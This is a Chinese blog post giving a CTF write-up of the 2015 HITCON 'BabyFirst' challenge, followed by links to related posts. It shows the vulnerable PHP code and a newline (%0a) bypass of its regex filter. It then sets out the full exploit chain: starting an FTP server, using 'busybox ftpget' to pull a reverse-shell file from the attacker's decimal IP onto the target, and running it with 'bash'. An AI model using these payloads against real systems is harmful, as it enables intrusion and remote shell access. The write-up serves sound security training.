命令执行漏洞---题目练习(2015 HITCON BabyFirst)

最新推荐文章于 2023-09-24 18:25:28 发布
最新推荐文章于 2023-09-24 18:25:28 发布
阅读量5.3k 收藏 1
点赞数
分类专栏: CTF学习总结 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/L2329794714/article/details/123600501
版权

一、2015 HITCON BabyFirst

环境:

攻击机:kali--192.168.198.128、win10浏览器

目标机器:ubuntu--92.168.198.135

题目源代码:

<?php
$dir = 'sandbox/' .$_SERVER['REMOTE_ADDR'];
if (!file_exists($dir))
        mkdir($dir);
chdir($dir);

$args = $_GET['args'];
for ($i=0; $i<count($args);$i++){
        if (!preg_match('/^\w+$/', $args[$i]))
                exit;
}
exec("/bin/orange " .implode(" ",$args));
?>

为用户创建一个沙箱目录,对用户输入数据作正则限制”^\w+$“,让后用用户输入数据执行exec(),这是注命令执行点。关键是要对正则限制的绕过,限制为:输入只能有数字、字母下划线组成,这导致我们无法直接利用&&、$()等来进行执行我们的命令。因为题目里得到正则表达式没有开启多行匹配,可用用换行符来绕过,即正则表达式最后的 $ 符看到 \n 就认为匹配完了。而且,利用换行符我们可用执行后面我们的命令。如下建 执行 touch test 命令。

http://ip/index.php?args[0]=a%0a&args[1]=touch&args[2]test

执行后网站后台成功创建test文件

单我们直接向文件写入数据比较困难 > 符号用不了,我们写不了数据但我们可用让它下载数据,利用 wget、ftp 等从我们自己搭建平台下载数据,下列以 FTP为例

wget可用参考下面的文章:

https://blog.spoock.com/2017/09/09/Babyfirst-writeup/

首先搭建自己的FTP服务平台,利用python 的pyftpdlib模块快速搭建一个匿名FTP服务(对于在真实环境中,我们要让目标机器访问到我们得到FTP服务,我们的主机必须要有公网IP或者和目标主机在同一网络下)。下载pyftpdlib模块

pip下载:pip install pyftpdlib

创建含反弹shell 的文件

执行搭建:python -m pyftpdlib -p 21

将搭建的TFP服务平台的IP地址转换为十进制(因为正则限制下不能有点符号)

构造

busybox ftpget 3232286336 1   
?args[0]=a%0a&args[1]=busybox&args[2]=ftpget&args[3]=3232286336&args[4]=1

浏览器执行: 

网站后台已经成功次下载了 含反弹shell的文件 

 现在只需要执行目标机器上的反弹shell ,我们就能以www-data的身份进入系统内

在反弹的IP机器上监听:

 浏览器输入

?args[0]=a%0a&args[1]=bash&args[2]=1

可用看到我们的攻击机已经成功连接目标机器: 

头秃的bug
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[红明谷杯]wp(正则注入,hex绕过)
Huamang的博客
04-03 749
write_shell <?php error_reporting(0); highlight_file(__FILE__); function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$input)){ die('hacker!!!'); }else{ retur
第五第六式web安全之xss漏洞命令执行漏洞专题.pdf
06-22
tsrc线上培训 第五第六式web安全之xss漏洞命令执行漏洞专题
CTF-web 第十三部分 命令注入
热门推荐
iamsongyu的博客
11-25 1万+
一 、基本原理 命令注入指的是,利用没有验证过的恶意命令或代码,对网站或服务器进行渗透攻击。 注入有很多种,并不仅仅只有SQL注入。比如: 命令注入(Command Injection) Eval 注入(Eval Injection) 客户端脚本攻击(Script Insertion) 跨网站脚本攻击(Cross Site Scripting, XSS) SQL 注入攻击(SQL ...
如何巧用vps解题?
蚁景网安学院
02-23 1238
点击蓝字关注我们前言对于Web方向的选手来说,拥有一台vps可以快速解决一些RCE问题,本篇文章所演示的是2015HITCON的一道web题,虽然时隔有些久,但是这题所利用的trick以...
命令注入突破长度限制 | 从CTF题目讲起
纸房子
12-03 7085
命令注入中往往会存在注入命令的长度过短的情况,无法将全部命令完全的输入进去,这种情况下就需要我们来想办法突破系统命令长度的限制。我们从三道CTF题目来讲解一下这种渗透策略。一.BabyfirstSovled: 33 / 969 Difficulty: ★★ Tag: WhiteBox, PHP, Command InjectionIdeaUse NewLine to bypass regula
1 命令执行
最新发布
qq_42041946的博客
09-24 80
代码分析:接受GET方式提交的参数args (数组)匹配数组中每一项是否只由数字、 字母、下划线组成,最后执行/bin/true命令,并且拼接args参数。2、根据匹配代码: preg_match('/^\w+S/', Sargs[Si) ,可知Sargs中每一项必须只能由数字、字母、下划线组成。3、根据执行代码implode(" ", $args),可知$args中每一项都使用 " "空格分隔,符合执行多条命令的条件。\n -> url编码%0a,并且%0a也会绕过 匹配代码。
HITCON-Training-Writeup:https的简要说明
04-29
cd HITCON-Training && chmod u+x ./env_setup.sh && ./env_setup.sh 大纲 基础知识 介绍 逆向工程 静态分析 动态分析 开发 有用的工具 IDA PRO 广发银行 Pwntool 实验1-sysmagic 部分 编译,链接,组装 执行 ...
HITCONxTDoH-2015-Crypto-Game:TDOHacker在HITCON CMT 2015上的比赛
05-13
HITCONxTDoH-2015-加密游戏
HitCon-2015-spartan-0day-exploit:HitCon 2015斯巴达人0day&exploit
05-12
HitCon-2015-spartan-0day-exploit 1、IsolationHeap 2、MemoryProtection 3、Spartan Memory Manage(MemGC) 4、CFG 5、Exploit Bypass All 6、0day 因为与微软的协议,所以PPT中的bypass CFG和0day漏洞的详细细节...
HITCON-Badge:HITCON徽章相关文件
04-29
HITCON徽章 (非常)HITCON 2017电子徽章的简单手册。 概述 HITCON 2017电子徽章(HEB)基于联发科技MT7697 SoC。 您可以使用microUSB代替电池! 除非您不知道如何恢复它,或者不再希望参加CTF,否则请不要刷新您的...
HITCON-ZeroDay年度报告.pdf
08-28
HITCON-ZeroDay自2015年底成立以来,通过建立可靠的漏洞通报平台,协助企业有效管理和修复安全漏洞,并为通报者提供及时的反馈,以建立起双方的信任关系。 报告中的核心概念是“HITCON-ZeroDay”平台,它承担着多项...
Hitcon2015 babyfirst复现 (php执行打包文件)
a3320315的博客
02-09 452
0x01 源码 <?php highlight_file(__FILE__); $dir = 'sandbox/' . $_SERVER['REMOTE_ADDR']; if ( !file_exists($dir) ) mkdir($dir); chdir($dir); $args = $_GET['args']; for...
CTF web题总结--绕过正则表达式
bob的博客
08-30 1万+
绕过正则表达式
HITCON 2015 BabyFirst(命令执行绕正则)
郁离歌丶的博客
05-16 1711
题目地址:https://github.com/otakekumi/CTF-Challenge/blob/master/PHP/chall_4/index.php借上次的docker环境,稍微改了下。本地搭了个环境玩。代码审计,整个程序的逻辑是为一个客户端创建一个sandbox/clientip的目录,通过正则表达检查参数值,要求所有的参数仅仅只能为数字和字母。而/bin/orange最终发现只是...
Hitcon2015 babyfirst复现
0verWatch的博客
09-14 1122
前言 继续上面的题目,直接利用上一道题目的docker环境复现一道题目,注意这里面的docker环境可能需要自己在某些文件夹下面设置权限,自己缺点什么环境就自己下就行了,感觉这个题目的难度比较上一题低了一点,参考博客: https://blog.spoock.com/2017/09/09/Babyfirst-writeup/ 正文 先放个题目代码 &lt;?php high...
【CentOS 7.2】Orange 0.6.4 安装与配置
Fly2Leo的专栏
06-24 3751
Orange是一个简单易用的开源API Gateway 一、安装依赖 (1)安装OpenSSL(Openresty依赖库) yuminstall openssl-devel (2)安装PCRE(Openresty依赖库) yuminstall pcre-devel (3)编译安装Openresty(Orange依赖) wgethttps://openresty.org/dow
Babyfirst的分析和解答
qq_41281571的博客
08-25 448
解题报告 本地环境搭建的时候,要把php.ini里的disable_function:后面的exec给去掉,不然就不能执行exec()函数。 去掉以后,要重启一下php-fpm: ststemctl restart php-fpm wget 命令:从指定的服务器IP下载文件 解题: 审计代码: 读完代码后发现服务器将会给每个客户端ip以IP号在当前目录下(www下面)的sandbox...
命令执行漏洞学习
weixin_47306547的博客
09-14 2155
目录 命令执行漏洞简介 命令执行漏洞成因 命令执行漏洞危害 PHP中可以调用外部程序常见函数 1)system() 2) passthru() 3) exec() 4)shell_exec() 5)执行运算符(反引号 `) 6)popen() 7) proc_open() 命令执行漏洞简介 应用程序有时需要调用一些执行系统命令的函数,如在php中,使用system、exec、shell_exec\passthru、popen、proc_popen等函数可以执行系统命令。当黑客.
25分钟了解命令执行漏洞【例题+详细讲解】(一)
贤鱼的博客
09-11 2707
一文初入命令执行漏洞
[hitcon 2017]ssrfme 1
04-11
这道题目是一个SSRF漏洞题目。SSRF全称为Server Side Request Forgery,是一种常见的Web安全漏洞。当存在SSRF漏洞时,攻击者可以将服务器作为代理,进而访问在内部网络中无法访问的资源,如内部Web应用、数据库等。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值